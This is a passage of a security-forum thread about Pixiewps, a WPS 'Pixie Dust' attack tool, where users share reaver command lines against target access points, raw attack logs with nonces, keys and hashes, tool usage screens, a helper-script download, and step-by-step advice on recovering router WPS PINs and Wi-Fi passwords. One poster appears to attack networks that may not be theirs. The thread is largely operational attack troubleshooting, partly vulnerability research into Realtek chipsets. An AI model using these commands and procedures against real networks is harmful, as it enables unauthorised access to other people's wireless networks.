
Thread: Pixiewps: wps pixie dust attack tool

  1. #101
    Join Date
    2015-Mar
    Posts
    127
    @mmusket33
    I like the idea of your script to automatically try different data sets. I tried it out and it didn't parse the output from reaver correctly.
    The E-Nonce and PKE were blank, and it leaves out (-m, --r-nonce : Registrar nonce), but all the required data was in the reaver output.

    Usage command line:
    reaver -i wlan2mon -b 00:00:00:00:A7:7C -m 00:00:00:00:2c:ee -vv -f -c6 -N -K1 -s y -A -t30 | tee /root/VARMAC_LOGS/TP-TP-LIN00000000
    Code:
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
    
    [+] Switching wlan2mon to channel 6
    [+] Waiting for beacon from 00:00:00:00:A7:7C
    [+] Associated with 00:00:00:00:A7:7C (ESSID: TP-TP-LIN0000000)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: ba:18:d0:c0:0a:6f:9e:9e:02:48:74:3c:c4:17:8e:1a
    [P] PKE: 8f:e6:47:0d:0c:c9:ee:9e:be:28:9b:c7:64:00:ed:b7:54:21:65:5d:c3:74:cb:9f:97:08:42:19:0e:b0:6a:da:91:41:97:1f:f0:79:1d:ae:d8:e3:9c:ac:10:cc:17:73:77:2a:d5:6b:68:d3:3c:85:9a:8d:ef:57:ce:bc:07:c2:7b:4b:24:f1:36:ea:0a:f7:50:b2:e4:24:89:38:99:df:b8:a9:5d:5b:29:b9:87:a7:59:72:3c:7a:6c:d7:da:88:b7:bb:4b:d9:97:08:b5:00:0c:c1:c3:96:8f:10:48:b8:5e:e6:e9:0e:0b:f4:2d:cf:4a:5a:bd:62:e3:27:1f:3e:13:93:ab:1a:b2:bd:bf:1f:41:d4:a5:4d:d9:a9:59:13:16:f0:d0:da:ad:a0:67:b4:34:27:f8:1a:85:4a:2e:a0:c0:b4:12:10:ba:54:d3:4f:ce:37:51:3f:72:f9:6d:99:d4:49:07:ca:13:2b:6f:41:bc:8a:c7:ac:bf:7b:14:58
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Name: TL-WR720N
    [P] WPS Model Number: 1.0
    [P] Access Point Serial Number: 1.0
    [+] Received M1 message
    [P] R-Nonce: 11:a4:d4:0f:5e:9e:dd:57:ae:12:5e:35:f2:49:43:18
    [P] PKR: 19:6c:b3:0b:98:97:39:c2:3c:a3:f9:10:02:64:d9:07:61:23:7e:f4:71:c7:8f:c1:0e:a9:2c:47:fd:25:7b:61:92:f7:90:fe:05:60:d6:ae:3c:8e:44:60:9f:1e:50:37:e3:5e:e5:e2:fc:b0:59:5f:37:a7:54:1a:33:63:92:ce:96:6b:9a:dd:2e:8b:cd:86:c7:1c:da:ef:45:04:be:c9:b2:0e:cd:14:ad:12:24:25:fb:32:b7:65:40:28:29:f8:5d:98:29:1c:26:1b:6e:10:93:5b:7b:56:1d:4d:84:c9:0d:cb:49:ae:4f:4c:0b:5b:b8:16:80:6e:13:59:fc:52:84:f8:33:3a:49:ee:91:31:8a:a2:4e:1a:01:b2:42:3d:a1:1c:4a:64:33:ae:db:11:05:3c:39:d5:45:69:b4:b5:a6:42:6b:95:2f:3f:b6:07:26:cb:5c:4f:dc:7f:fd:b8:f2:84:6c:5e:23:c6:e0:fd:2e:1d:fa:0a:1f:51:e1:fa
    [P] AuthKey: ad:4e:14:01:53:68:1f:c9:4b:bc:c7:7d:ab:96:08:2a:03:6d:dd:29:de:72:21:85:b0:08:a8:0b:bb:66:af:4b
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M1 message
    [P] E-Hash1: b6:9a:85:cb:6d:f9:67:b7:1f:00:9a:da:58:b7:60:ab:01:18:7e:92:5b:5a:43:64:49:6e:d9:32:46:1f:38:ff
    [P] E-Hash2: ab:75:8b:80:2e:68:3f:d7:d3:01:b5:81:dc:d6:0a:1e:d4:f0:67:d1:6d:d3:0e:be:80:9a:8f:d7:17:87:ac:2d
    [+] Running pixiewps with the information, wait ...
    [Pixie-Dust]  
    [Pixie-Dust]   Pixiewps 1.1
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    PDDSA-05.sh output:
    Code:
    E-Nonce: =
    E-BSSID: = 00:00:00:00:A7:7C
    PKE: =
    PKR: = 8e:8b:95:32:8b:63:02:72:29:fc:4a:60:6f:ba:63:42:e9:e3:f7:39:d3:86:fe:09:d7:94:22:48:5c:40:fd:17:54:f6:30:f5:ba:84:49:4e:34:fb:34:d8:44:c5:c9:ef:bf:e4:56:98:f8:0b:38:e4:00:39:b7:aa:75:6d:5a:77:fb:5a:eb:86:2c:86:f0:cd:44:fd:81:9d:b3:1f:e4:de:10:02:e2:02:40:f5:f3:72:ec:eb:b4:15:96:69:7a:54:ce:48:66:2a:5d:3b:6d:28:82:0c:f8:58:5f:71:31:79:45:72:a7:bd:15:89:46:ec:dc:c1:7f:a6:b5:aa:9a:51:8e:28:5d:4a:3e:87:27:f9:d9:e1:30:4e:44:aa:18:63:62:79:7e:a7:4f:85:9c:e7:5e:1d:ca:e5:81:e3:04:98:94:8c:3b:8c:b0:9c:4b:05:bb:99:3e:7b:86:19:f3:e6:e7:ae:64:be:d6:13:08:d0:9b:74:f4:b5:72:9b:62:8d
    AuthKey: = 44:7a:30:93:b2:57:65:37:ed:9e:68:ce:32:68:f6:3f:6f:93:7d:cd:9c:01:fa:8a:17:0f:25:be:94:9c:fb:03
    E-Hash1: = 96:0a:c7:fa:93:37:cd:7e:28:31:6f:a5:af:58:95:e7:28:ae:c4:54:75:62:de:8e:39:34:71:0a:ea:c4:91:bc
    E-Hash2: = df:67:fb:4e:b9:bb:b6:0c:82:78:80:99:7c:bb:9f:a4:b2:4f:04:fd:e0:db:dd:32:ae:5b:f1:0a:7c:35:ae:c8
      
    Pixiewps 1.1 WPS pixie dust attack tool
     Copyright (c) 2015, wiire <wi7ire@gmail.com>
    
     Usage: pixiewps <arguments>
    
     Required Arguments:
    
        -e, --pke           : Enrollee public key
        -r, --pkr           : Registrar public key
        -s, --e-hash1       : Enrollee Hash1
        -z, --e-hash2       : Enrollee Hash2
        -a, --authkey       : Authentication session key
    
     Optional Arguments:
    
        -n, --e-nonce       : Enrollee nonce (mode 2,3,4)
        -m, --r-nonce       : Registrar nonce
        -b, --e-bssid       : Enrollee BSSID
        -S, --dh-small      : Small Diffie-Hellman keys (PKr not needed)   [No]
        -f, --force         : Bruteforce the whole keyspace (mode 4)       [No]
        -v, --verbosity     : Verbosity level 1-3, 1 is quietest            [2]
    
        -h, --help          : Display this usage screen
    
     Examples:
    
     pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
     pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
     pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S
    
     [!] Bad enrollee nonce -- --e-bssid
    
    
       WPS Pin Not Found.
      Pixie Dust Sequences Exhausted - ending program.
    This was with repeated tries; in the first try, not posted here, I used -P in reaver. In every set it left out PKE and E-Nonce... no R-Nonce.
    I'm happy to help beta test, but you should probably make your own thread to troubleshoot.
    Last edited by nuroo; 2015-05-10 at 14:48.

  2. #102
    Join Date
    2013-Jul
    Posts
    818
    To Nuroo:

    First thank you very much for the heads up and the posted information.

    It looks like another version of reaver has been released that we are not aware of. Our version does not produce the R-Nonce.

    PDDSA-05.sh will not work with the version of reaver you have. However, just as soon as we can find the new version we will add the R-Nonce, correct the coding and post it. It should not take more than a day or two as the basic awk engine is in place.

    MTeams
    Last edited by mmusket33; 2015-05-11 at 12:17.

  3. #103
    Join Date
    2013-Jul
    Posts
    818
    To nuroo:

    We coded in the R-Nonce and did about an hour of testing.

    This version supports the latest modded reaver program from t6_x, datahead and soxrok2212 as of 11 May 15.

    You can download PDDSA-06.sh

    http://www.datafilehost.com/d/a30c5b3d

    OR at the aircrack link in our thread above.

    Please test!

    Older versions of the modded reaver program are not supported by PDDSA-06.sh.

    MTeams

  4. #104
    Join Date
    2015-Mar
    Posts
    127
    Would be cool if pixie used CUDA cores for the -f option.
    Last edited by nuroo; 2015-05-12 at 21:28.

  5. #105
    Join Date
    2015-Mar
    Posts
    54
    I've updated pixiewps.

    Changelog:
    - Mostly fixes; there were also some memory leaks (the cracking part was ok though, so don't worry)
    - Removed "modes" from the usage screen and from the warning ("[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.")
    - Changed verbosity from 2 to 3 by default
    - Added seconds and milliseconds time prints with milliseconds precision
    - Added compiling optimizations (-O3) which I forgot last time... whoops (the cracking speed should be 2x or 3x times faster with -f)

    So this "new version" doesn't bring anything new.

    Sorry if I missed anything, I've been kinda busy lately. Also, sorry if I broke some of your scripts which use pixiewps again...

  6. #106
    Join Date
    2015-Mar
    Posts
    127
    Hey wiire we all appreciate your work.

    Can you clear up a few things for me please:
    Code:
    Examples:
    
     pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
     pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
     pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S
    
     [!] Not all required arguments have been supplied!
    What other arguments are used?
    Are there any other usage examples?

    Is it necessary to try all attacks on a single data set?
    Last edited by nuroo; 2015-05-14 at 20:30.

  7. #107
    Join Date
    2015-Mar
    Posts
    54
    Quote Originally Posted by nuroo View Post
    Hey wiire we all appreciate your work.

    Can you clear up a few things for me please:
    Code:
    Examples:
    
     pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
     pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
     pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S
    
     [!] Not all required arguments have been supplied!
    What other arguments are used?
    Are there any other usage examples?

    Is it necessary to try all attacks on a single data set?
    The first example is the most general and what you would normally run.

    The second example only shows that you can avoid specifying the PKr if you have selected small keys in Reaver.

    The last example shows that pixiewps can also compute the authkey if the small key option in Reaver is selected, but it also needs the BSSID of the target and the Registrar nonce. It's useful if you don't have a modified version of Reaver or Bully because you can gather that data from a capture file.

    Those are the only 3 useful ways you can run pixiewps. Running the first example and also adding the Enrollee BSSID and the Registrar nonce, for instance, doesn't 'add anything' to the program functionality.

    Pixiewps automatically tries all modes/brands. For Realtek though it tries to bruteforce a small window of seeds. In any case, if the AP might be vulnerable to that kind of bruteforce and Pixiewps wasn't able to recover the pin, it'll warn you to run it again with the --force option.

    NOTE: if you use small keys on pixiewps but not on reaver, then pixiewps won't be able to find the pin even if the router is vulnerable, no matter what.

    Also for Realtek you shouldn't use small keys.

    I saw that some guys who are posting tutorials on YouTube aren't aware of these concepts.

  8. #108
    Join Date
    2015-Mar
    Posts
    127
    Thanks for the explanations, I was unsure.

    So basically use modified reaver with example 1 and avoid small keys, and -f if pixie warns?

    No need to try example 2 or 3 if 1 fails.

  9. #109
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by nuroo View Post
    Thanks for the explanations, I was unsure.

    So basically use modified reaver with example 1 and avoid small keys, and -f if pixie warns?

    No need to try example 2 or 3 if 1 fails.
    yup, and option 3 if you don't have the authkey

  10. #110
    Join Date
    2015-May
    Posts
    3
    why not use untwister to bruteforce the seed and then from there find the pin for the currently unsupported routers?

  11. #111
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by dragood View Post
    why not use untwister to bruteforce the seed and then from there find the pin for the currently unsupported routers?
    The reason is that unsupported routers use /dev/urandom to generate the random numbers.

    Untwister only supports the basic PRNGs of certain libraries (glibc's, Mersenne Twister, PHP's MT variant, Ruby's). These are simple and easy-to-crack PRNGs.

    But unsupported routers use /dev/urandom, which is safer and makes it complicated to find the seed.

  12. #112
    Join Date
    2015-May
    Posts
    1
    That's my first time using Kali Linux and this kind of tools. I have successfully retrieved the PIN for a BSSID, but every time I get the PIN code for a Wifi network, the network does not show anymore in wash -i interfacename. With that, I could not use reaver to retrieve the password.

    I tried it 3 times, and every time I use pixiewps, the network disappears from the wash list.

    By the way, I have another doubt: I tried to send some packets to an AP and now it shows as WPS Locked, but it's staying in this state forever. I tried to change my MAC address but it didn't work. I must force it to reconnect, right (and maybe the router is invulnerable to this kind of command)?

    Thank you guys.

  13. #113
    Join Date
    2015-Apr
    Posts
    12
    Some Realtek chipsets are pretty secure I guess.

    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 00:00:3c:10:00:00:53:d4:00:00:74:ed:00:00:0c:48
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Realtek Semiconductor Corp.
    [P] WPS Model Name: DG-BG4100NU
    [P] WPS Model Number: EV-2006-07-27
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: c8:4b:9c:51:3d:52:23:df:ce:8e:18:d5:4b:89:1a:b3
    [P] PKR: af:f1:92:37:1c:2a:0a:39:45:43:61:12:f5:4f:e0:17:e5 :a7:87:fd:cc:2c:e2:12:bd:ea:d3:81:f5:78:69:af:d4:6 6:92:96:1e:8a:80:1e:dc:b5:0a:78:9f:61:44:46:aa:5e: 9c:be:cd:f9:9a:52:62:c6:95:8a:e2:01:66:03:fd:9c:41 :53:b5:db:b0:09:04:01:37:6f:75:35:4b:e2:07:59:15:1 2:47:70:3b:be:5c:c4:5c:34:9a:9f:d3:cf:a6:dc:e7:fb: fa:a8:b9:7b:19:ae:6f:fd:ef:82:e1:ab:ad:00:5c:29:c7 :23:10:83:9c:cc:a5:ee:dc:ff:d1:7e:a2:21:ae:43:09:7 f:7f:13:71:52:ab:fb:f1:b7:7a:8a:8f:55:4b:d6:a9:70: de:35:d0:9a:2d:24:26:8c:08:71:a0:f4:2f:2c:96:6d:be :23:17:24:1b:fa:fd:d7:27:19:d5:37:06:c5:27:d1:70:7 d:5f:34:ea:29:c7:5e:cd:d8
    [P] AuthKey: 3f:dc:87:64:38:9d:7b:fa:61:8e:c7:66:ad:5a:da:60:59 :3e:f3:c3:0b:98:24:a0:37:e7:fa:ef:7e:bc:d5:53
    [+] Sending M2 message
    [P] E-Hash1: 25:46:44:c3:0d:4c:ad:b9:02:34:77:47:d0:93:04:aa:18 :52:7b:87:aa:cf:74:4f:32:aa:c6:60:d9:d5:4f:6d
    [P] E-Hash2: eb:64:f8:14:7c:fc:e3:ba:06:a5:e8:42:c7:36:d7:98:63 :fd:f2:f1:d6:f0:e9:8d:e9:81:2d:88:db:87:13:65
    [+] Running pixiewps with the information, wait ...
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s 660 ms
    [Pixie-Dust]
    [Pixie-Dust] [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
    [Pixie-Dust]
    [+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]

  14. #114
    Join Date
    2013-Sep
    Posts
    262
    It looks like it uses the same PKE as the supported Realtek chipset:
    Code:
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
    Which chipset/model is it?

  15. #115
    Join Date
    2015-Apr
    Posts
    12
    This model is Digisol DG-BG4100NU
    The E-Nonce is always generated in that format.
    E-Nonce: 00:00:xx:xx:00:00:xx:xx:00:00:xx:xx:00:00:xx:xx

  16. #116
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by DetmL View Post
    Some Realtek chipsets are pretty secure I guess.

    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 00:00:3c:10:00:00:53:d4:00:00:74:ed:00:00:0c:48
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Realtek Semiconductor Corp.
    [P] WPS Model Name: DG-BG4100NU
    [P] WPS Model Number: EV-2006-07-27
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: c8:4b:9c:51:3d:52:23:df:ce:8e:18:d5:4b:89:1a:b3
    [P] PKR: af:f1:92:37:1c:2a:0a:39:45:43:61:12:f5:4f:e0:17:e5 :a7:87:fd:cc:2c:e2:12:bd:ea:d3:81:f5:78:69:af:d4:6 6:92:96:1e:8a:80:1e:dc:b5:0a:78:9f:61:44:46:aa:5e: 9c:be:cd:f9:9a:52:62:c6:95:8a:e2:01:66:03:fd:9c:41 :53:b5:db:b0:09:04:01:37:6f:75:35:4b:e2:07:59:15:1 2:47:70:3b:be:5c:c4:5c:34:9a:9f:d3:cf:a6:dc:e7:fb: fa:a8:b9:7b:19:ae:6f:fd:ef:82:e1:ab:ad:00:5c:29:c7 :23:10:83:9c:cc:a5:ee:dc:ff:d1:7e:a2:21:ae:43:09:7 f:7f:13:71:52:ab:fb:f1:b7:7a:8a:8f:55:4b:d6:a9:70: de:35:d0:9a:2d:24:26:8c:08:71:a0:f4:2f:2c:96:6d:be :23:17:24:1b:fa:fd:d7:27:19:d5:37:06:c5:27:d1:70:7 d:5f:34:ea:29:c7:5e:cd:d8
    [P] AuthKey: 3f:dc:87:64:38:9d:7b:fa:61:8e:c7:66:ad:5a:da:60:59 :3e:f3:c3:0b:98:24:a0:37:e7:fa:ef:7e:bc:d5:53
    [+] Sending M2 message
    [P] E-Hash1: 25:46:44:c3:0d:4c:ad:b9:02:34:77:47:d0:93:04:aa:18 :52:7b:87:aa:cf:74:4f:32:aa:c6:60:d9:d5:4f:6d
    [P] E-Hash2: eb:64:f8:14:7c:fc:e3:ba:06:a5:e8:42:c7:36:d7:98:63 :fd:f2:f1:d6:f0:e9:8d:e9:81:2d:88:db:87:13:65
    [+] Running pixiewps with the information, wait ...
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s 660 ms
    [Pixie-Dust]
    [Pixie-Dust] [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
    [Pixie-Dust]
    [+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    What it could be is that the router's time is set ahead... aka it is in the future. I forget the wiggle room that pixiewps is programmed with, but I don't think it goes into the future. I might have an older version that counts up from January 1, 1970, but it probably got erased when I reinstalled Kali... and on 10.10.4 beta my Mac kernel panics when a VM shuts down :/

    Quote Originally Posted by DetmL View Post
    This model is Digisol DG-BG4100NU
    The E-Nonce is always generated in that format.
    E-Nonce: 00:00:xx:xx:00:00:xx:xx:00:00:xx:xx:00:00:xx:xx
    That is actually quite strange, I've never seen that before... Is it always like that? The reason I ask is because before the Realtek flaw was discovered, I noticed that the PKE was static for Realtek devices (confirmed with help from kcdtv and some other users) which made me question Realtek's implementation. I sent some data up to Dominique and he worked his magic and got back to me right away with his findings.

    --Perhaps this could mean something else....?

    Quote Originally Posted by scout View Post
    That's my first time using Kali Linux and this kind of tools. I have successfully retrieved the PIN for a BSSID, but every time I get the PIN code for a Wifi network, the network does not show anymore in wash -i interfacename. With that, I could not use reaver to retrieve the password.

    I tried it 3 times, and every time I use pixiewps, the network disappears from the wash list.

    By the way, I have another doubt: I tried to send some packets to an AP and now it shows as WPS Locked, but it's staying in this state forever. I tried to change my MAC address but it didn't work. I must force it to reconnect, right (and maybe the router is invulnerable to this kind of command)?

    Thank you guys.
    Some ISPs/manufacturers have actually taken notice of the Pixie Dust attack and they lock WPS after 1 exchange, even if it fails. I also have a network where WPS disappears at random times and I can't figure that out. It might be that the owner disabled it in the firmware and it doesn't take effect until an attack, but don't quote me on that; I'm really stumped as to why I can't figure it out. I can't even get to an M2 message...
    Last edited by soxrok2212; 2015-05-28 at 23:45.

  17. #117
    Join Date
    2015-Apr
    Posts
    12
    Quote Originally Posted by soxrok2212 View Post
    That is actually quite strange, I've never seen that before... Is it always like that? The reason I ask is because before the Realtek flaw was discovered, I noticed that the PKE was static for Realtek devices (confirmed with help from kcdtv and some other users) which made me question Realtek's implementation. I sent some data up to Dominique and he worked his magic and got back to me right away with his findings.

    --Perhaps this could mean something else....?
    Yes, always in that format. A Google search on EV-2006-07-27 shows that it's a Realtek 8186 chipset. However, I'm not 100% sure that it is the correct chipset as the router is not in the WikiDevi database.

  18. #118
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by DetmL View Post
    Yes, always in that format. A Google search on EV-2006-07-27 shows that it's a Realtek 8186 chipset. However, I'm not 100% sure that it is the correct chipset as the router is not in the WikiDevi database.
    You could try looking it up in the FCC database...?

  19. #119
    Join Date
    2013-Sep
    Posts
    262
    Code:
    EV-2006-07-27
    That's definitely a value that Realtek uses for the tagged parameter "WPS version" in the probes.

    Code:
    The E-Nonce is always generated in that format.
    E-Nonce: 00:00:xx:xx:00:00:xx:xx:00:00:xx:xx:00:00:xx:xx
    It looks like you used the small DH key option (-S) when you ran reaver 1.5.2, isn't it?
    For a successful pixie dust attack vs a supported Realtek chipset you need to use "normal" DH keys and shouldn't use option -S in your reaver command line.
    Could you send us the *.cap file with the legitimate PIN and some screenshots from the web interface?
    Can you enter the web interface with the credentials super:super?
    Does your default PIN start with 0?

  20. #120
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by kcdtv View Post
    Code:
    EV-2006-07-27
    That's definitely a value that Realtek uses for the tagged parameter "WPS version" in the probes.

    Code:
    The E-Nonce is always generated in that format.
    E-Nonce: 00:00:xx:xx:00:00:xx:xx:00:00:xx:xx:00:00:xx:xx
    It looks like you used the small DH key option (-S) when you ran reaver 1.5.2, isn't it?
    For a successful pixie dust attack vs a supported Realtek chipset you need to use "normal" DH keys and shouldn't use option -S in your reaver command line.
    Could you send us the *.cap file with the legitimate PIN and some screenshots from the web interface?
    Can you enter the web interface with the credentials super:super?
    Does your default PIN start with 0?
    It's not small DH keys; those are 00:00:00:00:00....00:00:00:00:02. If I can find the time I'll take a look at it, but a cap with the WPS exchange would be helpful.

  21. #121
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by DetmL View Post
    Yes, always in that format. A Google search on EV-2006-07-27 shows that it's a Realtek 8186 chipset. However, I'm not 100% sure that it is the correct chipset as the router is not in the WikiDevi database.
    I just looked up the RTL8671; it is a CPU chip and not a NIC. Do you know the exact model number of the AP and can you provide a firmware/open source code for it? Thanks.

  22. #122
    Join Date
    2015-Apr
    Posts
    12
    There is no FCC ID printed on the router. The PIN is also not printed on the router. The exact model of the AP is DIGISOL DG-BG4100NU, which uses the RTL8186 and not the newer RTL8671. Firmware of the router can be downloaded here: https://dl.dropboxusercontent.com/u/..._11OCT2014.zip Firmware of the chipset: http://sourceforge.net/projects/rtl8186/

  23. #123
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by DetmL View Post
    There is no FCC ID printed on the router. The PIN is also not printed on the router. The exact model of the AP is DIGISOL DG-BG4100NU, which uses the RTL8186 and not the newer RTL8671. Firmware of the router can be downloaded here: https://dl.dropboxusercontent.com/u/..._11OCT2014.zip Firmware of the chipset: http://sourceforge.net/projects/rtl8186/
    Thanks, we'll look into it!

  24. #124
    Join Date
    2015-Jun
    Posts
    6

    WPS Model Number: EV-2006-07-27 is the RTL8671 chipset, too

    Quote Originally Posted by DetmL View Post
    Yes, always in that format. A Google search on EV-2006-07-27 shows that it's a Realtek 8186 chipset. However, I'm not 100% sure that it is the correct chipset as the router is not in the WikiDevi database.
    Hi @DetmL, @soxrok2212,
    I recently came to know about the vulnerabilities of Realtek and other chipsets and thought to check if my router was vulnerable, and ran reaver with pixie dust mode -K 1,
    where I got to know that the model number EV-2006-07-27 belongs to the RTL8671 chipset (D-Link router).

    However I'm getting that

    "WPS pin not found"

    The output is given below:

    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 7b:37:51:7f:6c:c7:a8:0b:27:e9:a1:f8:5b:88:b5:40
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Realtek Semiconductor Corp.
    [P] WPS Model Name: RTL8671
    [P] WPS Model Number: EV-2006-07-27
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: c2:ed:e2:d6:80:81:48:fd:7e:13:7b:d2:3e:6c:a0:98
